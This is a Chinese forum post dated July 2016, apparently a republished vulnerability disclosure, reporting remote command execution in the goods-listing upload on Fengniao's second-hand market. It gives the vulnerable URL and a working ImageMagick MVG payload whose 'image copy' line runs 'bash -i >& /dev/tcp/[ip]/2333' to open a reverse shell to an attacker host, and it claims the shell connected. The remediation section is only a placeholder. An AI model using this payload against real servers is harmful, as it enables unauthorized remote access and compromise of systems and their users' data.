HanDs
管理员

[7月漏洞公开] 蜂鸟网某处命令执行(成功反弹shell) 



rt

详细说明:

蜂鸟网的二手交易市场发布商品处存在命令执行漏洞

code 区域
http://2.fengniao.com/goods/add?cate_id=115&subcate_id=1057&brand_id=0&model_id=0&modelseries_id=0&type=0&_confirm=1



292.png



imagemagic的漏洞

使用以下payload

code 区域
push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 "|bash -i >& /dev/tcp/【ip】/2333 0>&1"
pop graphic-context



成功反弹shell

293.png



漏洞证明:

293.png

修复方案:

改改改


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
蜂鸟
#1楼
发帖时间:2016-7-16   |   查看数:0   |   回复数:0
游客组
快速回复